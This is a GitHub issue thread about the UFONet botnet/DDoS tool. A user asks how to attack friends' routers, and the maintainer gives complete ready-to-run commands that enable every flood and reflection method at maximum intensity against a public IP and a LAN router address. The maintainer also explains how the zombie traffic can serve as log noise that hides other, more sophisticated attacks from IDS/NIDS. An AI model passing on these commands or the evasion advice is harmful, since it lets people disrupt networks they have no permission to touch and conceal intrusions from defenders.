### ISSUE TITLE
Attack normal router?

### ISSUE THREAD

**Issue by cyber-soldier1** [epsylon/ufonet#331]
Me and my friends would like to find out how powerful my current botnet is but I've looked everywhere and can't find a way to attack without an http/find an "attackable" http from their router, how would I be able to attack their router for a short period of time without them running a web server?

**Comment by epsylon** [comment]
@cyber-soldier1 UFONet **can test a server using domain/IP** as target.

In the case of a router, if you want to use all its strength and the device is accessible with a Public IP, an example would be the following:  

Ex: **ufonet -a "http://12.34.56.78/router_config.html" <ALL_options>**
```

----------------------------------------------
+_ARMAGEDDON! (with ALL!) (as root):
----------------------------------------------

 ufonet -a "http://12.34.56.78/router_config.html" -r "100" --threads "100" --loic "1000" --loris "1000" --ufosyn "1000" --spray "1000" --smurf "1000" --xmas "1000" --nuke "1000" --tachyon "1000" --monlist "1000" --fraggle "1000" --sniper "1000" --ufoack "1000" --uforst "1000" --droper "1000" --overlap "1000" --pinger "1000" --ufoudp "1000" 
```

However, if you are on a LAN, all "deflector" techniques (fraggle, tachyon, monlist, smurf, sniper & spray),  due to the "zombies" not having access, will be disabled. 

So you could use something like the following: 

Ex: **ufonet -a "http://192.168.1.1/router_config.html" <ONLY_DoS_options>**
```

----------------------------------------------
+_XCOM-2 (only DoS) (as root):
----------------------------------------------

 ufonet -a "http://192.168.1.1/router_config.html" -r "100" --threads "100" --loic "1000" --loris "1000" --ufosyn "1000" --xmas "1000" --nuke "1000" --ufoack "1000" --uforst "1000" --droper "1000" --overlap "1000" --pinger "1000" --ufoudp "1000"
```

**Comment by epsylon** [comment]
Therefore, if you do not have a server running at layer 7 (for example, some kind of web server), the rest of the attacks, for example at layer 3, are not possible. ;-( 

This is so because the most primitive design of UFONet (2013) only used (and at that time, in an exclusive, new and very imaginative way) the "reflectors" of the web and did not include all the other techniques that were added with time.

Therefore, the most central flow of the code focuses on enhancing the performance of the "zombies" and that these serve, in the same way, as a confusion tool for the server that receives the attack, since there are multiple IPs that are connect, but if desired, there is one, the one who uses UFONet, which can have tremendously unusual and larger traffic, since the tool allows you to send many more packets than an "iframe" or an "redirector" and this can raise suspicions in the IDS/NIDS 

Although detecting it is still as possible with the rest of the "zombies" around, its combination with other tools and techniques is also very useful in other types of attacks. You can leave UFONet generating "noise" in the logs and making unique requests, sometimes of up to 10 rounds or if you have a large list of "zombies", a single request, something tremendously complex to filter without damaging other legitimate services (for example , a request from the google API, which has been on the Community's list of "zombies" for a long time) and launch other types of offensives more sofistacated... 

Finally and to understand everything better, at that time the tool was more focused on mass protest and not on the action of a single operator, which it also allows today.
